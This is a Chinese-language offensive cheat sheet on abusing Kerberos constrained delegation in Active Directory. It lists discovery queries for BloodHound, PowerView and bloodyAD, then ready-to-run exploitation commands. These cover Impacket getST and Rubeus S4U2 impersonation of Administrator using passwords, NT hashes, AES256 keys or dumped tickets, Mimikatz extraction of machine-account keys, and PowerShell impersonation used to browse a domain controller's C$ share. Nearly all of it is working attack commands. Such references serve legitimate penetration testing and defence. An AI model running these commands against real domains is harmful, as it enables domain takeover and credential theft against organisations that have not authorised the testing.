跳转至

Kerberos 委派 - 约束委派 (Constrained Delegation)

Kerberos 约束委派 (Kerberos Constrained Delegation, KCD) 是 Microsoft Active Directory (AD) 中的一项安全功能,它允许某个服务模拟用户或其他服务,以便代表该用户或服务访问资源。

发现约束委派 (Identify a Constrained Delegation)

  • BloodHound: MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
  • PowerView: Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft
  • Native
Get-DomainComputer -TrustedToAuth | select -exp dnshostname
Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
  • bloodyAD:
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))' --attr sAMAccountName,msds-allowedtodelegateto

利用约束委派 (Exploit the Constrained Delegation)

  • Impacket
getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
  • Rubeus: S4U2 攻击 (S4U2 attack) (S4U2self + S4U2proxy)
# 使用密码 (with a password)
Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password"

# 使用 NT 哈希 (with a NT hash)
Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt
Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
dir \\dc.domain.com\c$
  • Rubeus: 使用现有票据执行 S4U2 攻击以模拟 "Administrator" (use an existing ticket to perform a S4U2 attack to impersonate the "Administrator")
# 导出票据 (Dump ticket)
Rubeus.exe tgtdeleg /nowrap
Rubeus.exe triage
Rubeus.exe dump /luid:0x12d1f7

# 创建票据 (Create a ticket)
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt
  • Rubeus : 使用 aes256 密钥 (using aes256 keys)
# 获取机器帐户的 aes256 密钥 (Get aes256 keys of the machine account)
privilege::debug
token::elevate
sekurlsa::ekeys

# 创建票据 (Create a ticket)
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt

服务上模拟域用户 (Impersonate a domain user on a resource)

要求 (Require):

  • 在配置了约束委派的机器上具有 SYSTEM 级权限 (SYSTEM level privileges on a machine configured with constrained delegation)
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
PS> $idToImpersonate.Impersonate()
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
PS> ls \\dc01.offense.local\c$